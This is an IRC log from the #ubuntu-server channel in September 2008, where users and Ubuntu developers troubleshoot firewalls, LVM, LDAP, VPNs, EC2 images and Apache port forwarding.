<simonlavallin> is anyone on this chanell
<simonlavallin> I am a newbie and dont know if i am doing this properly
<soren> alpha232, simonlavallin: Patience, children! Patience!
<mdz> soren: can you help me understand what the kvm/evdev mess has to do with VNC?
<jdstrand> mdz: fyi-- soren is afk for a bit
<LMJ> Hi
<Overand> I'm using UFW - and it doesn't sseem to be writing its rules out to any files.  It's *working* - but I don't see any rules created in a file anywhere.
<Overand> I've even gone into /etc and done "grep -r (some port I opened up) *" and am not seeing squat
<jdstrand> Overand: rules added via the 'ufw' command are added to /var/lib/ufw/*rules
<didrocks> jdstrand: I have pushed a new version of ufw btw
<didrocks> normally, this is the final one regarding case insensitive implementation
<jdstrand> didrocks: ok. I will likely not be able to get to it til early next week, but a big thanks
<didrocks> I added lot of tests
<didrocks> jdstrand: not a problem. Take your time :)
<didrocks> (all is explained in the attached bug to my branch)
<jdstrand> didrocks: cool, thanks
<Shitakeguy> Howdy
<NCommander> Well that was stupid
 * NCommander just killed /dev
<arakthor> o_O
<arakthor> how?
<jmedina> at least wasn't /
<NCommander> Had it bound into a chroot
<NCommander> DIdn't want the chroot
<NCommander> forgot to unmount
<NCommander> The system hasn't crashs yet
<NCommander> *crashed
<jmedina> can't you re load it, mount it or something?, reload udev,
<jmedina> or something
<NCommander> trying
<NCommander> woot, that did it
<jmedina> what?
<NCommander> restart udev repopulated dev
<NCommander> :-)
 * NCommander is building a linux from scratch system
<jmedina> NCommander: good!
<Shitakeguy> Command prompts are fun.
<NCommander> I'm rebootstrapping Ubuntu from source
<NCommander> But I need to rebuild everything with a different set of flags
<Shitakeguy> Hi.  I want to replace the 2 Windows servers on this school's network but i have to make sure that I get all the services changed over to ubuntu (woot).  Anybody done this before?
<ScottK> Shitakeguy: People have done it before, but it takes some planning and testing.
<jmedina> Shitakeguy: depends on the services
<ScottK> What services do you have to replace?
<Shitakeguy> LOL I'm actually not sure...  which is where the problem stems from...
<Shitakeguy> crap... that server isn't available on the net.
<NCommander> Shitakeguy, if its just a file server, its fessiable to possibly replace it with SAMBA, If its an AD master, I won't try it
<jmedina> probably it is a AD without GPOs, so a simple domain controller
<NCommander> Well, you could emulate AD functionality with an LDAP server, but you still would have to rejoin every client last time I checked
<NCommander> (and managing an LDAP server is still a pain compared to Active Directory)
<NCommander> (AD is awesome just because when it works, its perfect. Its when one of the DCs ****s itself do you have issues)
<Shitakeguy> DCs?
<NCommander> Domain Controllers
<arakthor> domain controllers
<Shitakeguy> gotcha.  duh
<IntuitiveNipple> You can add Samba DC into an existing AD domain and then demote the current master and have Samba take over... there's documentation somewhere about it :)
<NCommander> Microsoft's GPO/AD server side stuff pretty much blows everything else away in terms of set it and forget it tech
<jmedina> there are trick to move one user from one domain to other, and changes the SID in the windows registriy en everything
<NCommander> IntuitiveNipple, Samba emulates an NT4 master
<NCommander> IntuitiveNipple, if your running in 2000 or 2003 Native Mode, thats not going to cut it anymore
<ScottK> And Samba 4 isn't there yet ...
<Shitakeguy> o.k. from what I understand the only thing that my boss knows that the controllers do is to ...  run successmaker, and...
<Shitakeguy> well... oh!  the other one has a halfassed setup file server.  with like 20 network mounted drives that nobody uses, or understands, or knows why they are there.
<Shitakeguy> most don't know that it's there at all...
<NCommander> The file server easy enough to replace
 * NCommander uses Samba over NFS these days since its so easy to setup
<Shitakeguy> Dude!  I was at A&M university and they have this cabinet with 40  18-gig HD's setup inside and also some kind of ... looked like a hard-drive carousel...
<Shitakeguy> Sorry... hehe.  I'm going to put that thing on the NEW IMPROVED file server.
<arakthor> that nobody uses?
<arakthor> :p
<arakthor> cool idea though, got any pics?
<Shitakeguy> yeah.  they donate their old equipment to schools and stuff.
<Shitakeguy> I work at a school.
<Shitakeguy> They had two cabinets that looked the same size, but they had covers on them.  2 Silicon Graphics ones and a sun microsystems one.
<Shitakeguy> is there a command to write the irc log to a file right now so i can save this?
<IntuitiveNipple> I've seen it done - native 2003 - there was something else on the Linux side besides Samba... http://nitrobit.com/grouppolicy.html
<Shitakeguy> ewwww
<Shitakeguy> good.  they have 2003 servers here... when you say  'native 2003'...  talk low tech to me.
<Shitakeguy> that nitrobit URL did give me wood though.
<Shitakeguy> thanks
<jmedina> GPOs are good, with samba and only opensource you need to use poledit (wich sucks)
<jmedina> nitrobit looks promising
<Shitakeguy> GPOs?
<Shitakeguy> but yes.  nitrobit looks tasty
<bogey_> This is a bit like suse enterprise
<spiritssight> Any one here that got some time helping a very new person to get setup and make sure is working correctly so that can serve a non-profit website
<kees> and people say perl is unreadable...         if not 'nx' in [x[x.find(': ')+2:] for x in open("/proc/cpuinfo").read().splitlines() if x.startswith('flags')][0].split(' '):
<ajmitch> kees: what's wrong with that? :)
<kees> hehe, well, I can read it (I wrote it) but it made me feel like I was writing Perl again
<ajmitch> it is a little compact...
<ajmitch> but list comprehensions are useful like that
<kees> actually, I can lose the read().splitlines() part
<ajmitch> readlines?
<kees> just open()
<ajmitch> ah, you can iterate over that by line, can you?
 * ajmitch didn't know that
<kees> in list context it does the same a read().splitlines()
 * kees nods
<ScottK> Well you can write Python that's unreadable, but it takes work.  Similarly you can write Perl that's readable.  That also takes work.
<kees> heheh
<boshhead> Umm, that's perl?
<ajmitch> so there's no flag where 'nx' can appear as part of the string?
<boshhead> Oh, that's not perl. Okay :) I thought I was losing it for a second.
<kees> ajmitch: my code breaks the flag list into an array.
<kees> ajmitch: if 'nx' in ['anx','nxb']:
<kees> will fail, e.g.
<ajmitch> right, I should have read the bit that irssi wrapped :)
<kees> heh
#ubuntu-server 2008-09-05
<warchief_ryan> Anyone know how to make a NAT box but still be able to use the host box with iptables? Ive seen a few "guides" but they don't seem to say if you can still use the host box, from the command its looks like there just forwarding everything...
<warchief_ryan> example,
<warchief_ryan> iptables -A FORWARD -i eth0 -o eth1 -m state ESTABLISHED,RELATED -j ACCEPT,
<warchief_ryan> iptables -A FORWARD -i eth1 -o eth0 -j ACCEPT,
<warchief_ryan> iptables -A FORWARD -j LOG,
<warchief_ryan> iptables -i NAT -A POSTROUTING -o eth0 -j MASQUERADE.
<warchief_ryan> im new to iptables but that looks like it would just forward everything, so I wouldn't be able to connect to that box and have it send and receive packets right?
<warchief_ryan> like if I tryed to ssh into it
<ajmitch> FORWARD chain is separate from INPUT
<ajmitch> so you can still ssh to it
<warchief_ryan> so it would still recognise packets for the host that aren't meant to be forwarded to box's behind it?
<ajmitch> yes
<twb> To save me a few minutes of searching, does anyone have the URL for Ubuntu's end-of-life policy for LTS releases?
<leonel> twb: https://wiki.ubuntu.com/Releases
<twb> Thanks.
<Overand> jdstrand: thanks, re: ufw data location
<Overand> jdstrand: Looks like I misread the wiki article, ah well.
<jdstrand> np
<spiritssight> any one recommend a good Dynamic DNS provider for website that uses gmail for the mail and a desktop for the webserver with a dynimic IP and also has ssl cert
<spiritssight> also has more then one subdomain
<uvirtbot> New bug: #239640 in openvpn-blacklist (main) "openvpn-vulnkey disagrees with openssl-vulnkey" [Undecided,Invalid] https://launchpad.net/bugs/239640
<arvind_khadri> does squid have GUI??
<arvind_khadri> any proxy server which has a GUI?
<uvirtbot> New bug: #264946 in dovecot (main) "Please update dovecot to 1.1.3" [Undecided,New] https://launchpad.net/bugs/264946
<uvirtbot> New bug: #264966 in openvpn (universe) "openvpn initscript no longer details the VPNs started" [Undecided,New] https://launchpad.net/bugs/264966
<NCommander> kees, ping?
<ghatak> Hi, is it possible to use logrotate to only delete files older than a certain period of time and not do any rotation of logs or compression ?
<soren> mdz: re vnc/kvm/evdev: It's the vnc frontend that needs to translate the incoming keycodes to pc scan codes. I don't know how familiar you are with NC, but it used to be that VNC sent keysyms over the wire, but back in January or February or thereabouts we added an extension to VNC that allows it to send scan codes instead, thus obviating the need to specify a keymap on the kvm command line, which it used to use to translate keysyms to scan codes.
<soren> s/ NC/VNC/
<soren> evdev, howver, changed the key code -> scan code mapping, so this went bonkers.
<mdz> soren: I'm not (knowingly) using VNC; is that used for local X display as well or something?
<soren> In the end, we found a way to detect evdev on the host, and make use of a different mapping when it's in use.
<soren> mdz: It's used by virt-manager.
<soren> mdz: ..and virt-viewer.
<soren> mdz: The frontend you get when you use kvm directly is SDL-based, and isn't quite fixed yet.
<soren> But the recommended way to use kvm anyway is through libvirt, so for all the recommended uses of kvm, the problem is fixed. I'm waiting for a patch for the SDL thing from upstream. It's not far off, but the guy working on it has been on holidays for the past couple of weeks.
<soren> mdz: You use a dvorak keymap, right? You must have had your share of pain dealing with qemu in the past?
<uvirtbot`> New bug: #264982 in samba (main) "Segfault in Samba" [Undecided,New] https://launchpad.net/bugs/264982
<NCommander> soren, qemu is why I went back to QWERTY from Dvorak
<soren> NCommander: You don't have to anymore.
<NCommander> I don't remember Dvorak
<NCommander> I tried using the Dvorak keyboard on my old desktop and find I don't remember how to touch type it anymore ;.;
<NCommander> brb
<mdz> soren: yes, I do, and no, I never had a problem with qemu
<soren> mdz: Oh, right, your keyboard does remapping in hardware?
<soren> mdz: Well, anyone who uses a non-US keyboard will know the pain it used to cause. With that new VNC extension all the known problems were solved. I would have been very sad to see it go away.
<NCommander> mdz, you have a hardware Dvorak keyboard? Nice!
<uvirtbot`> New bug: #265004 in postfix (main) "postfix upgrade does not replace /etc/postfix/postfix-script" [Undecided,New] https://launchpad.net/bugs/265004
<mdz> soren: how is the kernel handled for building EC2 VMs?
<soren> mdz: Xen has its own bootloader. You pass a kernel and initrd (and kernel command line) to the hypervisor. In EC2, this works by building a manifest that describes where to find the filsystem images, and the kernel, and the initrd.
<soren> ...so the kernel and initrd are entirely seperate from the image.
<mdz> soren: so we don't include a kernel or modules at all?
<soren> mdz: I'm still trying to work out the details of that. It depends somewhat on what the final outcome of the kernel is.
<soren> mdz: But I'm thinking "no".
<zul> soren: I was thinking about that last night and we might have to include the modules on the domU because there are use cases where poeple use things like asterisk on ec2
<soren> I think that's meant to be handled separately, then.
<zul> ?
<soren> The way i've seen it done is that the initramfs contains the essential things like net and blk, and anything else gets wgotten.
<zul> are you sure?
<soren> Not entirely. I may be confused by looking at both init scripts and image building scripts over the last few days.
<zul> heh
<chumley> I'm needing to set up a backup mail server. If the primary goes down, this system would queue the mail until the primary server comes back up. There is an option during install called "Internet with smarthost". I tried this yesterday and it appears to work. Is that the best way to set this up?
<uvirtbot`> New bug: #265058 in openvpn (universe) "openvpn2.1~rc7 fails to pick up the CN of certificates" [Undecided,New] https://launchpad.net/bugs/265058
<zul> what if the smarthost goes down?
<chumley> I'd like the ubuntu box to hold the mail and then deliver it when it comes back up.
<uvirtbot`> New bug: #265102 in bacula (universe) "bacula not compiled with FORTIFY_SOURCE" [Medium,Confirmed] https://launchpad.net/bugs/265102
<ScottK> leonel: http://lists.alioth.debian.org/pipermail/pkg-clamav-devel/2008-September/000049.html
<leonel> ScottK: suscribed to the list  and checking those patches ...
<ScottK> leonel: Great.
<fomigo>  I have a problem with Nautilus in Ubuntu 8.04. It doesn't work properly - CPU 50%, but in Nautlues over root it's all right. Maybe someone knows about it anything?
<jdstrand> kees: so, I consider you a bit of an lvm guru...
 * kees blushes
<jdstrand> kees: I recently had a drive just totally crap out on me and  won't even show up in the BIOS
<jdstrand> (post)
<jdstrand> it was drive #2 in an lvm setup (no raid, data easy to  replicate)
<jdstrand> but, in the interest of time, I'm hoping I can get to the data on drive one
<kees> jdstrand: what sort of LVs did you have in your VG?
<jdstrand> kees: it seems this should be possibly (I'm not sure drive #2 even really had much on it)
<jdstrand> kees: you mean the fs?
<kees> jdstrand: I actually mean the allocation of LV onto physical extents.
<kees> did you have 1 big LV, or many small, etc?
 * jdstrand goes and checks
<jdstrand> oh, well just one big one
<kees> was it larger than drive 1?
<jdstrand> kees: I had just the one for a large backup disk
 * kees nods
<jdstrand> kees: 2 160GB identical drives
<kees> lvdisplay -m LVPATH   will show you were it was allocated physically
<jdstrand> kees: yeah, that's part of the problem-- lvdisplay was no help because of the way the drive died
<kees> ah, the VG won't start?
<jdstrand> correct
<kees> hrm... this is now in a bit of a murky area for me.  Let me check the vgchange man page
<kees> jdstrand: is it the only VG on the system?
<Goosemoose> i set up apt-cacher, but im a bit confused on how to enter this in to preseed.cfg
<jdstrand> yes
<Goosemoose> anyone got a sec? the preseed.cfg docs are a bit confusing on this
<kees> jdstrand: does  vgchange -a y    error out?
<jdstrand> kees: it looks like I have the commands I used to set it up though
<jdstrand> $ sudo vgchange -a y No volume groups found
<kees> hunh.
<kees> sudo pvdisplay /path/to/drive/1
<jdstrand> kees: if you mean:
<jdstrand> sudo pvdisplay /dev/sdc
<jdstrand> or sdc[123]
<jdstrand> I get:
<kees> yeah, meant the partition
<jdstrand> $ sudo pvdisplay /dev/sdc3 No physical volume label read from /dev/sdc3 Failed to read physical volume "/dev/sdc3"
<kees> basically, is LVM able to read the "good" drive at all?
<jdstrand> kees: doesn't seem so, but fdisk can see the partition table
<kees> whoa, that's really odd
<kees> can you pastebin the commands you used to create it?
<jdstrand> kees: I have in my notes that I used partition typ 8e, but see in fdisk that it's 83...
<kees> something seems to have clobbered the drive?  or re-ordered it?
<jdstrand> kees: http://paste.ubuntu.com/43737/
<jdstrand> kees: this is not the exact commands after all..
<kees> yeah, looks fine.  (I've seen people do "whole drive" LVM stuff, and it's just painful)
<mathiaz> Goosemoose: http://paste.ubuntu.com/43738/ <- does that help ?
<jdstrand> kees: but I guarantee it is what I used, caused that's my recipe :)
<kees> so... if pvdisplay doesn't think it's an LVM PV, that's pretty unfun.  :(
<jdstrand> (with the possible exception of the extents)
<kees> jdstrand: I wonder if pvscan shows anything?
<kees> or pvscan -n ?
<jdstrand> no
<NCommander> hey kees
<Goosemoose> mathiaz ,looking
<jdstrand> kees: this machine goes way back and I remember when upgrading to hardy, I redid the drives
<kees> heya NCommander
<jdstrand> kees: maybe I only added the other drive to the lv
<jdstrand> kees: I won't waste any more of your time. thanks!
<NCommander> kees, I talked to the archive admins on doing the PIE changes
<NCommander> And worked out generally how it can be done
<kees> jdstrand: hrm.  yeah, if there's no PV signature, I'm stumped.  :P
<Goosemoose> mathiaz, i already have that part setup, this is for the apt setup
<kees> NCommander: ah cool.  who did you talk with?
<NCommander> kees, slangasek, pitti, and I'm blocking on the last name
<Goosemoose> the preseed i d/l had additional repositories, does the info you listed cover the apt-cacher already?
<Goosemoose> seemed like they were two different things
<NCommander> kees, it generally agreed that rebootstrapping the base system due to the static libraries is required since we have circular dependencies. However, they don't feel a full archive rebuild is needed, thus we just need to make sure any important packages are properly touched
<mathiaz> Goosemoose: the three entries I've used are used to setup the mirror option in the install
<mathiaz> Goosemoose: adding aditional apt repositories is also possible
<mathiaz> Goosemoose: it depends on what you wanna do
<Goosemoose> ok
<kees> NCommander: yeah, sounds right.
<kees> NCommander: can you document this stuff on the PIEExperiment wiki?
<kees> just so we have a record of issues and solutions
<NCommander> kees, once I make sure my resulting compiler works, I'm waiting on the regression testing
<kees> heh
<cameronh> When I enable AHCI for my SATA drive in my BIOS, Grub won't work (I get error 18 -- apparently Selected cylinder exceeds maximum supported by BIOS)
<NCommander> kees, ATM, I'm having trouble making the spec string changes "stick" so to speak
<kees> NCommander: did you see the patches I wrote?
<NCommander> kees, yeah, but your patches would affect all architectures
<kees> true, true.
<NCommander> I need the CPU dependent CC1 strings
<kees> look in debian/rules.patch (or something?).  it has per-arch patches.
<NCommander> Hrm
<NCommander> If a per architecture rules patch is possible then I could do it that way
<kees> yeah, that's what made patching it such a PITA.  My first few attempts would break PPC builds, etc.
<NCommander> kees, the i386 biarch build likes to break, so I'm still having compiler issues
<Goosemoose> anyone figure out how to get a computer to join a domain from a preseed.cfg ?
<Goosemoose> and user login authenticated against AD?
<uvirtbot`> New bug: #266910 in likewise-open (main) "likewise-open does not clean up conf files" [Undecided,New] https://launchpad.net/bugs/266910
<jdstrand> kees: well seems like it was user error-- just had the one bad drive in the lv
<kees> jdstrand: d'oh.
<jdstrand> ya, total d'oh!
<Goosemoose> anyone figure out how to get a computer to join a domain and log in a user against AD from a preseed.cfg ?
#ubuntu-server 2008-09-06
<ScottK> \o/ - Just added clamav and spamassassin to the server-ship seed, so they are officially supported for Intrepid now ...
<Kamping_Kaiser> \o/
<ScottK> So for Intrepid you should be able to build a pretty solid mail server completely out of Main.
<frith> hi, i just backported ldap 2.4.11 from intrepid to hardy,  i saw the config had been moved out of slapd.conf and into a cn=config directory
<frith> it seems to have left a number of ldif files around, do i need to import these files?
<NCommander> frith, did it need any work to be backported?
<NCommander> frith, I don't mind making it an offical backport if you want
<frith> so so
<NCommander> If you have the patchs, we can see on getting it offically backported to Hardy
<frith> i just back to backport libtool to compile it
<NCommander> ewwwww
 * NCommander twichs
<NCommander> We can't backport libtool sadlyt
<frith> you don't need it to run it
<NCommander> It's a complicated situation
<NCommander> Generally speaking build system tools are unbackportable since its too great of a change
<frith> indeed
<NCommander> So the way we "backport" the fix is with a hammer
<NCommander> A very big hammer
<NCommander> And at some point, I got dubbed "libtool guru", and get pointed to when we have a libtool explosion in the archive
<hads> Intrepid isn't that far away :)
<frith> i think linux should go more the freebsd route
<frith> i like having a stable base and then port apps to work
<frith> then again you can never win
<NCommander> frith, I'm looking forward to Debian kfreebsd-amd64
<NCommander> frith, that being said, libtool issues affect FreeBSD even worse than Linux since most libtool devs are linux based
<NCommander> (libtool is a godawful hack that should have never been made to exist)
<frith> i guess a lot of the problems come from creating a stable system and keeping people happy by having the latest version
<frith> ldap is just a pain right now as i want to get n-way replication working
<frith> and i have pressure to get subversion 1.5.1 deployed
<NCommander> frith, well, svn 1.5.1 was backported
<frith> i did it myself some time ago
<frith> just need to get sometime to test it
<frith> i hate deploying fairly untested revisions
<NCommander> frith, well, the backport was done by ScottK
<frith> its more a case of something weird happening to my code base
<frith> i get paranoid
<pcuser> anyone here?
<NCommander> pcuser, for some defintions of here
<pcuser> i need some help but i'm not sure what's the best channel for it
<pcuser> i'm looking for some direction?
<NCommander> pcuser, what do you need
<pcuser> i have a presentation to give on Monday about why you should use wep at college. I wanted to demonstrate cracking WEP. I've done this before on Fedora Core 7 but for some reason i can;t get it to work on Ubuntu 8.04
<pcuser> what channel should i go to for help?
<NCommander> #ubuntu
<NCommander> pcuser, I hope you mean "use wpa" vs use wep
<pcuser> wpa2 with radius authentication
<pcuser> i have the project done but i can't seem to get my usb card working in ubuntu
<pcuser> it's weird, i applied the patch and everything from aircrack-ng but i can't do packet injection for some reason
<pcuser> i had this working before but on fedora
<twb> http://www.ubuntu.com/news/zimbra-desktop
<twb> What is the ETA for ZCS (Zimbra) turning up in the hardy/partners repo?
<frith> hmm i can't drive my hosts file from my ldap server
<twb> frith: you mean you want "getent hosts" to get information from LDAP?
<frith> if i set my nsswitch to use ldap for hosts even getend passwd hangs
<twb> frith: are you using an IP to refer to your LDAP server?
<frith> nope,
<twb> If you're referring to your LDAP server by hostname, then obviously it can't resolve that hostname because it needs to use the- OK, nevermind
<frith> doh :)
<frith> i was stupid and put ldap first
<frith> don't suppose you know much about the 2.4.11 having its config in slapd.d and a number of .ldif files?
<twb> Sorry, no.
<frith> thanks
<frith> happiness is a server called ldap
<frith> right what else can i put onto ldap
<twb> Everything that's in NIS atm
<twb> >grin & duck<
<frith> never used nis
<frith> it looked awful, so i've avoided it
<frith> i think i should setup n-way replication soon
<frith> this new version with its weird config structure is a bit baffling
<_ruben> does ldap do/support some sort of caching by default? i want to be able local copy of the ldap tree when the main server isnt avail for whatever reason
<_ruben> s/able/able to query/
<frith> _ruben, you would use ccreds
<frith> or setup a replica
<_ruben> hmm .. ok
<frith> there is a howto
<frith> but i have problems with it
<_ruben> integrating ldap in our network is somewhere downthere on my huge todolist
<frith> i find that once i have it working,  it saves me loads of time
<frith> i think i should setup falcon next
<frith> cool sudo-ldap
<frith> wait why do i want that when i have ported all my groups to ldap
<frith> i can just add myself into the ldap admin group
<frith> duh i am thick
<_ruben> hehe
<frith> unless i could set sudo for each machine
<frith> that would be cool
<c_schmitz> can someone help me please?
<c_schmitz> I have a remote server with a kernel panic
<frith> who knows, ask
<c_schmitz> and i have no clue what caused this and how to fix it
<frith> you have remote management card in it?
<c_schmitz> yeah
<frith> reboot, look at the log files
<c_schmitz> let me post a screen shot
<frith> i would get it to do a memtest
<frith> does it kernel panic often? custom kernel?
<c_schmitz> http://imagebin.org/25856
<c_schmitz> its on boot
<c_schmitz> cannot boot at all
<c_schmitz> i doe not get to the login prompt
<frith> can you run the memtest?
<c_schmitz> how ?
<frith> well you have memtest in grub by default
<c_schmitz> its lilo
<frith> oh well
<frith> pxe boot?
<c_schmitz> sorry.. what is 'pxe boot' ?
<frith> network booting
<c_schmitz> i can run that but i would not know where to boot from
<c_schmitz> never did that
<frith> you have another server and dhcp server ont he network?
<c_schmitz> in fact I do
<c_schmitz> at least another server
<frith> https://help.ubuntu.com/community/Installation/Netboot
<c_schmitz> i see there is a memory test installed at the network boot menu
<c_schmitz> jsut running it
<c_schmitz> I guess i updated to the latest kernel which cause this
<c_schmitz> Is there a way i can boot the old kernel from lilo?
<frith> c_schmitz, only if you left an entry in for it
<twb> memtest is available from the d-i CDs (alternate, server), IIRC
<frith> twb, he is remote, so he really needs to netboot since he has lilo'd his system for some odd reason
<twb> frith: I was assuming he had a scratch monkey onsite
<frith> i don't trust monkey's they constant turn off the wrong machine
<frith> even if you set a message on the lcd
<c_schmitz> i have a friend now wokring on it
<c_schmitz> using a rescue system
<c_schmitz> thanks for your help
<c_schmitz> I am noticing how clueless I am
<c_schmitz> :-/
<frith> we all have to learn
<frith> loads of good people here
<twb> frith: yeah, monkeys are unfortunate.  I expected it to be less hassle than configuring netbooting if that wasn't already set up -- you need root on the DHCP server, a host on which to serve TFTP, etc.
<twb> But hey, whatever.
<frith> twb, true,  but very handy to have for the future
<c_schmitz> its a hetzner server
<c_schmitz> so they have a rescue system set up
<twb> frith: btw, IME if you put the /boot partition on a md RAID1'd, LVMd partition, then d-i will install Lilo instead of grub (because grub doesn't support that configuration).
<c_schmitz> its not so much hassle to get into it
<c_schmitz> but to know what to do next ;)
<twb> c_schmitz: hetzner?
<frith> twb, i just run grub twice
<c_schmitz> yeah.. its one of the more known root server providers in Germany
<twb> c_schmitz: oh, a hosting company.
<c_schmitz> yes
<frith> i wish i could afford to get some fibre into my garage
<frith> garageisp.net here i come
<twb> hcoop.net?
<twb> My personal preference would be a VM on something approaching big iron.
<twb> That way you have monkeys in the NOC to look after the physical hardware, and everything Just Works because VM hardware is simple and relatively uniform.
<twb> And if the iron goes down, there are thousands of irate customers instead of just one -- so the monkeys actually have an incentive to fix it.
<frith> eggs? basket?
<twb> frith: hmm?
<frith> i get paranoid about using vm for anything other than testing
<twb> WFM, shrug.
<shakaponk> hey guyz, i'm new to linux and ubuntu... how can i install vmware-tools in a ubuntu server distribution as vm?
<shakaponk> i've tried this tut: https://help.ubuntu.com/community/VMware/Tools
<shakaponk> but here: sudo vmware-toolbox it stops :-)
<shakaponk> nobody?
<ScottK> !weekend | shakaponk
<ubottu> shakaponk: It's a weekend.  Often on weekends, the paid developers, and a lot of the community, may not be around to answer your question.  Please be patient, wait longer than you normally would, or try again during the working week.
<shakaponk> just questions ;-)
<shakaponk> thx for the answer
<ScottK> If I could answer your actual question, I would have.
<shakaponk> ScottK: no problem, i don't want to put you under pressure ;-)
<uvirtbot`> New bug: #254581 in ubuntu-meta (main) "Ubuntu Server Print-server doesn't pull in all the printer modules and ppds" [Undecided,Triaged] https://launchpad.net/bugs/254581
 * delcoyote hi
<byte_slave> hello everyone!
<sommer> hi
<byte_slave> i'm stucked here, suddenly withou doing nothing, ubuntu 8.04 changed to "ubuntu intrepid (development branch)"
<byte_slave> and it doesn't accept the logins i used before
<byte_slave> how can i undo this?
<sommer> uhhh... reinstall?
<byte_slave> that was what i didn't want to do :(
<sommer> if you just need to login, boot to rescue mode and create a use, putting the user in the adm group
<sommer> that should let you login and at least copy any data to another machine
<sommer> for me intrepid has been quite stable...
<byte_slave> thats what i'm gonna do.
<byte_slave> thanks sommer.
<sommer> np
<byte_slave> one more thing! is pacific just install all from scratch and then attach the 3 hdds i've now full of backups? will i access it then without any problem?
<byte_slave> probably i've to make some "chown -R"
<sommer> if you've lost your old user's then, ya there will probably need to be some chown work
<byte_slave> ;) thats the minor problem
<sommer> so the machine is just a backup server?
<byte_slave> yes
<byte_slave> only that
<byte_slave> just need to reconfigure samba and rsync and it should work
<sommer> gotcha, if the data partions are seperate from the rest you can probably re-install without losing the data
<byte_slave> let me try reinstall first, then
<sommer> you'll just want to be careful during the partiion phase, and not reformat the wrong one :-)
<byte_slave> sure :)
<byte_slave> i guess for safety, ill turn off the other disks and the after all i connect them and i add it to fstab
<sommer> I'd think that'd work fine... but if it's only a backup server why not just run intrepid for the next month until release?
<byte_slave> do you thinks the final upgrade to the offical final release then will be peacfull?
<byte_slave> i never did any upgrade from previous to current versions ( at least voluntarily )
<sommer> heh, I'd think so, but there's no 100% garuntee
<byte_slave> we'll see. i guess i'll follow your instructions. thanks
<sommer> welcome
<byte_slave> at least i guess i can save my saturday night doing you way :) and i can go out drink some beers ;)
<byte_slave> BTW, the idea of create a new login at boot time can be done with 8.04 cd?
<sommer> heh, I definitely prefer beers over work :)
<sommer> if you have physical access to the machine grub will show you a recovery option in the list, that'll boot you to single user mode where you can use normal adduser, addgrp, etc
<sommer> much faster than booting from cd
<byte_slave> great! i don't even have a cdrom at the machine
<uvirtbot`> New bug: #259562 in network-manager-openvpn (universe) "NM0.7/Intrepid regression: No longer possible to configure LZO compression (dup-of: 260291)" [Undecided,Incomplete] https://launchpad.net/bugs/259562
<frith> i migrated my groups and users to ldap,   getent now shows duplicate groups and passwds
<gladk> hi all
<gladk> can anybody help with VPN server?
<ivoks> maybe
<gladk> I have installed it on Ubuntu 8.04 server, trying to connect it from Windows XP, connection establishes, but no ping..... nothing
<ivoks> VPN isn't the name of the program
<ivoks> that's a common name for couple of implementations
<ivoks> so, which vpn server are we talking about?
<ivoks> openvpn, pptpd...?
<gladk> pptpd
<gladk> and i cant ping connected client from server
<ivoks> ok, that one basicly works with almost no configuration
<gladk> yea, I just chenged ip-s
<ivoks> you added localip and remoteip in pptpd.conf?
<gladk> yes
<ivoks> from some other ip range?
<ivoks> or from the same as server?
<gladk> from same server
<ivoks> so, your server has an IP 192.168.0.1
<gladk> 192.168.0.17
<ivoks> and you've set up 192.168.0.x as a remoteip
<gladk> 192.168.177.X
<ivoks> ok, and localip is...?
<gladk> 192.168.177.234
<ivoks> so you can't ping 192.168.177.234 from connected client?
<gladk> yes
<gladk> no...
<gladk> I can ping client from client
<gladk> myself
<gladk> I cant ping client-server and server-client
<ivoks> firewall on server?
<gladk> iptables
<gladk> port 1723 opened
<ivoks> ping doesn't have anything with TCP or UDP ports
<ivoks> ping is ICMP
<gladk> it is allowed also
<ivoks> i don't know then... try dumping traffic
<ivoks> does other connections work?
<gladk> how can i dump traffic?
<ivoks> tcpdump
<ivoks> sorry, can't help you more... i'm tired
<gladk> ivoks: thank you anyway
<ivoks> 'night
<lukehasnoname> As Intrepid comes closer, it might be good to have a "What's new in the Intrepid Ibex" page on Ubuntu.com listing new features of the server edition in a high-level, short-description manner
<uvirtbot`> New bug: #267279 in drbd8 (universe) "DRBD Primary-Primary Setup on Hardy crashes in certain situations" [Undecided,New] https://launchpad.net/bugs/267279
#ubuntu-server 2008-09-07
<Paulrf> Hi!  I have Apache2 installed on Ubuntu.. works fine internally - can't see it outside DLink DIR655 router...  Virtual Server set up and pointing to port 80 on Apache...  does anyone have any suggestions?
<Paulrf> Me thinks all are asleep :-)
<Gargoyle> what error do you get?
<Paulrf> It times out
<Gargoyle> Are you really testing from outside, or are you trying to see it yourself from inside?
<Paulrf> Well I went to dyndns and tried their port test... it indicated hmm just a sec
<Paulrf> Sorry - it indicates:  74.232.187.85:80 was refused.
<Paulrf> Verified IP correct...
<Gargoyle> You would need to double check your router settings... no firewall rules overriding the port foraward? and you deffo have your internal IP correct?
<Paulrf> Yes.. internal ip def right...  I have not set up firewall.. it's not enabled by default, true?
<Paulrf> oh you mean on router
<Gargoyle> I don't mean ubuntu, on the router
<Paulrf> No...  I don't think there's anything in the router settings...  though I'm not certain it isn't the issue
<Gargoyle> So from your machine, you can access the server using 192.168.... or 10.x.x or whatever?
<Paulrf> Yes.. the internal server is 192.168.0.200... I can see that from any computer inside the firewall
<Gargoyle> Paulrf: And you have the gateway setup in ubunti correctly to point to your router?
<Paulrf> Yes... the server access the net fine...
<Paulrf> accesses
<Paulrf> Actually, I'm on it now
<Paulrf> I appreciate your help Gargoyle
<Gargoyle> Do you see apache listed if you do "netstat -tl"
<Gargoyle> actually, do -tln
<Gargoyle> I can't remember if apache listenes on all IP's by default or not
<Gargoyle> you should have 0.0.0.0:80 in the local address column.
<Gargoyle> another good start would be to make sure that your ISP does not block any inbound ports.
<Paulrf> paulrf@paulrf:/etc/apache2$ sudo netstat -tanp |grep apache
<Paulrf> tcp        0      0 0.0.0.0:10001           0.0.0.0:*               LISTEN
<Paulrf> They say they don't block ports
<Gargoyle> that is not listening on port 80. Did you forward external port 80 to 10001?
<Paulrf> I did as a test, but I thought I changed it back.. just a sec
<Paulrf> ports.conf indicates listening on 80...
<Paulrf> where would it pull hte 10001 from?
<Paulrf> hmmm I probably didn't restart apache after I made the change
<Paulrf> tcp        0      0 192.168.0.200:80        0.0.0.0:*               LISTEN      9163/apache2
<Paulrf> That looks better
<Gargoyle> yup
<Gargoyle> Probably wouldn't hurt to reboot your router after you have checked the port forward. Unless you can check the routing tables in your router to make sure it has accepted the update.
<Paulr1> Okay - I just rebooted
<Paulr1> Open port report still showing as refused
<Gargoyle> Do you know howto use nmap?
<Paulr1> I don't but I see it's a scanner
<Paulr1> You think the isp may have ports blocked?
<Gargoyle> Yup. You could use it to check that your router does actually have 80 open...
